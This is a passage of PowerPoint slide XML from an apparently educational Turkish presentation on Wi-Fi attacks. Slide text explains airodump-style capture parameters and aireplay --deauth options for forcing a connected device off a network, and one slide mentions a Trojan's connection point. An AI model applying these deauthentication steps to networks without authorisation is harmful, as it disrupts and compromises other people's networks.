                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Metin kutusu 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5683D659-B3A9-20C4-AC06-656C5E85944F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9535886" y="372533"/>
            <a:ext cx="344384" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Metin kutusu 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2081F241-9F2F-F76A-8761-F1528518379C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8526043" y="1186465"/>
            <a:ext cx="866899" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Metin kutusu 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B0AD85A-D5F7-D47C-BC2E-B7BC39296D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8004628" y="1644753"/>
            <a:ext cx="676894" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Metin kutusu 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE8B69F0-6BB7-72A0-62BA-38D6C78C5ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7155544" y="2228403"/>
            <a:ext cx="687009" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>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2472161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51F0C4B5-4E7F-5E5A-0CEC-6C20838670D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="2760" r="-1" b="16806"/>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060634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E8F3E414-2FF5-AE64-BAD5-500938FC8148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="23977" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="180279" y="161490"/>
            <a:ext cx="5289188"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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Resim 4" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F999A0EA-2E21-B32A-6D11-9CCBE09EC8F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483921" y="161490"/>
            <a:ext cx="6527800" cy="6534092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19524281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8726DA6E-3488-10AB-60ED-241FAF2DC9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="4014" r="12722"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2" name="Metin kutusu 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C181CC9-9350-88E9-BD92-7573E664FD3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2850776" y="4446494"/>
            <a:ext cx="9156585" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hedef makinanın </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ile bağlantıya geçtiği yer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294875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cihaz, metre, kontrol paneli içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36FC1803-66D5-42EF-9163-545A91E15AD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="63500" y="-1"/>
            <a:ext cx="12128500" cy="1828801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Resim 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA87516-50F2-799C-5BA5-B36F20A162A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3570513"/>
            <a:ext cx="12128501" cy="1671338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Metin kutusu 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{262E27C7-AC23-CD24-6E81-AA7DD3284A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63501" y="2093185"/>
            <a:ext cx="12065000" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Elde edinilen bilgiler aşağıdaki kurallara göre yazılır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>parametresi ile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ağımızın adını belirtiyoruz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>parametresi ile hangi kanalı kullanıyorsa onu belirtilir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00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ile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> kartımızın MAC adresini belirtiyoruz. Böylece o ağa bağlı cihazları görmüş oluyoruz. Diğer aşamada ise o ağa bağlı olan bir cihazın düşmesini ağa bağlanıp çıkmasını istediğimiz için </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>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toolundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> yardım alıyoruz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Metin kutusu 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99E91CEE-EE2E-C543-5C10-D88A8B84900B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5305676"/>
            <a:ext cx="12065000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00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parametresi ile ağımızdan 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> gibi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sürede düşüp tekrar bağlanmasını istiyoruz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00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parametresi ile bağlı olan cihazın MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>adrtesini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> belirttik.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>parametresi ile bağlı oldu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wife</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> kartımızın </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> adresini gösterdik.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ignore-negative-one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00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parametresi ile bir kerede düşüp tekrardan bağlanabileceğini söyledik.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2660143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912477B-67BD-4F0B-ACAE-1C5BF920F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metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7C977D1-81B3-FCFC-AA48-C5F8DBB543BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="35496"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191980" cy="6331872"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12188952" h="6315978">
                <a:moveTo>
                  <a:pt x="6486084" y="6245969"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6485084" y="6246049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6484857" y="6246597"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12188952" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12188952" y="5238584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12150377" y="5251521"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11896790" y="5332759"/>
                  <a:pt x="11641002" y="5407122"/>
                  <a:pt x="11383290" y="5474518"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10968422" y="5584862"/>
                  <a:pt x="10550113" y="5680933"/>
                  <a:pt x="10129257" y="5765538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9796024" y="5832470"/>
                  <a:pt x="9461557" y="5892407"/>
                  <a:pt x="9125853" y="5945322"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8804164" y="5996289"/>
                  <a:pt x="8481635" y="6042032"/>
                  <a:pt x="8158253" y="6082550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7910683" y="6113512"/>
                  <a:pt x="7662604" y="6139760"/>
                  <a:pt x="7414269" y="6164607"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6648435" y="6232122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6632990" y="6234248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6486833" y="6245909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6496346" y="6247777"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6508052" y="6248255"/>
                  <a:pt x="6520188" y="6246025"/>
                  <a:pt x="6531910" y="6246025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6548092" y="6246025"/>
                  <a:pt x="6564274" y="6243349"/>
                  <a:pt x="6580582" y="6242968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6812863" y="6237362"/>
                  <a:pt x="7044888" y="6224874"/>
                  <a:pt x="7276786" y="6209583"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
